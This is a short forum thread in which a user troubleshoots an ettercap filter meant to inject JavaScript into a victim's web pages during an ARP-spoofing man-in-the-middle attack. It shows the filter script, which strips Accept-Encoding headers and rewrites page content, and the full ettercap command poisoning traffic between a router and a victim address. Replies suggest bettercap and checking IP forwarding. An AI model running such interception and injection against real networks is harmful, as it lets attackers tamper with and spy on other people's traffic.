Jump to content

Does ettercap filter still work now?


Recommended Posts

I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now? Anyway, this is my filter script

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
msg("zapped Accept-Encoding!\n");
}
}

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "<head>")) {
replace("<head>", "<HEAD>");
msg("Code injected");
}
}

And I run it as

ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100//

test.ef is the compiled filter file.

When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the html source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part,

if (ip.proto == TCP && tcp.dst == 80) {

replace("<head>", "<HEAD>");
msg("Code injected");

}

"Code injected" message shows, but html code on the web client is not changed, which means, the problem is that the filter cannot find any named strings (in this case <head>) in the html file, it can only deal with the header (Accept-Encoding). Does anyone know a solution or work around, please, any suggestions will be appreciated, thanks

Link to post
Share on other sites

There is also bettercap. 

 

Link to post
Share on other sites
2 hours ago, kdlsw said:

@digipThanks, I will look into that. so many options for mitm these days, I just tested MITMF, another similar tool, which didn't work for me too well, hope this one is good. Thank you.

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often its something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

Link to post
Share on other sites
10 hours ago, digip said:

If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often its something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks.

Thank you, this is helpful! I will try it!

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...